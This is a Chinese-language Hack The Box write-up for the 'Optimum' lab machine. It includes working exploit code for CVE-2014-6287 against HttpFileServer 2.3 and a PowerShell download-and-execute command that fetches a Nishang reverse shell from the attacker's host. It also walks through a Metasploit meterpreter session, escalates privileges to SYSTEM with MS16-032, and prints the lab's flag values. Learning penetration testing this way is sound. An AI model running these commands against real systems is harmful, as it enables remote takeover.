Hackthebox - Optimum
靶场信息
靶场类型
信息搜集
Nmap
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-09 23:06 EST
Nmap scan report for 10.10.10.8
Host is up (0.52s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 477.43 ms 10.10.16.1
2 477.52 ms 10.10.10.8
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.98 seconds
Http
只有一个80端口开着,去看看HTTP的内容
这似乎是一个文件服务器,试试有没有弱口令可以登录的
测试了几个弱口令,都没登录进去,看看其他方法
这里可以看到有一个HttpFileServer 2.3,去searchsploit一下看看有没有相关的漏洞
Searchsploit
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# searchsploit HttpFileServer 2.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
这里确实有一个RCE,测试一下是否可用
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# cat CVE-2014-6287.py
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
print(url)
response = http.request('GET', url)
except Exception as ex:
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
print(ex)
尝试执行一下
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 whoami
http://10.10.10.8:80/?search=%00{.+exec|whoami.}
这里没有给我任何回显,我不确定是否执行成功了,去测试一下吧
本地使用tcpdump监听一下网卡,然后执行一下ping我们自己的命令
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 "ping 10.10.16.3"
http://10.10.10.8:80/?search=%00{.+exec|ping%2010.10.16.3.}
┌──(root💀kali)-[~/Desktop]
└─# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:25:22.516278 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [S], seq 2814804000, win 64240, options [mss 1460,sackOK,TS val 3571996960 ecr 0,nop,wscale 7], length 0
23:25:22.747740 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [S.], seq 3736611079, ack 2814804001, win 8192, options [mss 1355,nop,wscale 8,sackOK,TS val 122838 ecr 3571996960], length 0
23:25:22.747788 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3571997191 ecr 122838], length 0
23:25:22.747968 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 3571997191 ecr 122838], length 142: HTTP: GET /?search=%00%7B.+exec%7Cping%2010.10.16.3.%7D HTTP/1.1
23:25:23.203303 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 1:219, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 218: HTTP: HTTP/1.1 200 OK
23:25:23.203352 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 219, win 501, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.203376 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], seq 219:1562, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1343: HTTP
23:25:23.203381 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1562, win 498, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.204028 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 1562:1679, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 117: HTTP
23:25:23.204036 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1679, win 501, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.434280 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], seq 1679:3022, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1343: HTTP
23:25:23.434317 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 3022, win 501, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.434339 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 3022:3139, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 117: HTTP
23:25:23.434346 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 3139, win 501, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.434354 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 3139:4164, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1025: HTTP
23:25:23.434359 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 4164, win 498, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.437193 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [F.], seq 143, ack 4164, win 501, options [nop,nop,TS val 3571997881 ecr 122884], length 0
23:25:23.879455 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], ack 144, win 257, options [nop,nop,TS val 122953 ecr 3571997881], length 0
23:25:24.151025 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [F.], seq 4164, ack 144, win 257, options [nop,nop,TS val 122953 ecr 3571997881], length 0
23:25:24.151044 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 4165, win 501, options [nop,nop,TS val 3571998595 ecr 122953], length 0
23:25:47.421881 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:48.422841 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:49.424354 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:50.425946 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
确实是成功被执行了,那就可以确认该漏洞是存在,并且exploit也是可以使用的
漏洞利用
方法 1
既然知道了什么漏洞可以用,那就简单了,来构造POC吧
根据CVE-2014-6287的提示,这里应该是使用powershell进行回弹一个shell,咱们找一个powershell的利用工具
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
我这边是找到一个脚本,咱们给下载下来,然后去尝试执行
然后稍微修改一下
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
我们将这句代码复制下来,粘贴到代码最底部,然后把IP修改为我们自己的IP
然后在本地使用python3开启一个http服务
python3 -m http.server 80
然后使用exp进行下载
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.16.3/Invoke-PowerShellTcp.ps1%27%29.}
PS C:\Users\kostas\Desktop> whoami
optimum\kostas
成功得到了shell
方法 2
msf6 > search HttpFileServer 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msfconsole可以直接使用
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.3 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
设置好相关配置,然后执行
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:5555
[*] Using URL: http://0.0.0.0:8080/zKFWDMqMmVKxA
[*] Local IP: http://192.168.200.128:8080/zKFWDMqMmVKxA
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /zKFWDMqMmVKxA
[*] Sending stage (175174 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\UZMLMeDqW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:5555 -> 10.10.10.8:49178) at 2022-03-10 00:02:29 -0500
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
这边也成功拿到了shell
权限提升
使用systeminfo或其他方式都可以看到补丁信息
去搜查补丁信息,或是使用msf的提权辅助脚本都可以知道
这边MSF有个提权可用脚本
use windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
exploit
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Compressed size: 1016
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\IQyTwKukUqs.ps1...
[*] Compressing script contents...
[+] Compressed size: 3588
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1936
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2024
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
xQiD0FWfxy0Q3rUwptuxobxZ7Fk20m8U
[+] Executed on target machine.
[*] Sending stage (200262 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.8:49188) at 2022-03-10 00:34:05 -0500
[+] Deleted C:\Users\kostas\AppData\Local\Temp\IQyTwKukUqs.ps1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
成功拿到system权限
meterpreter > search -f user.txt.txt
Found 1 result...
c:\Users\kostas\Desktop\user.txt.txt (32 bytes)
meterpreter > cat 'c:\Users\kostas\Desktop\user.txt.txt'
d0c39409d7b994a9a1389ebf38ef5f73
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cat 'c:\Users\Administrator\Desktop\root.txt'
51ed1b36553c8461f4552c2e92b3eeed
成功拿到user和root权限的flag文件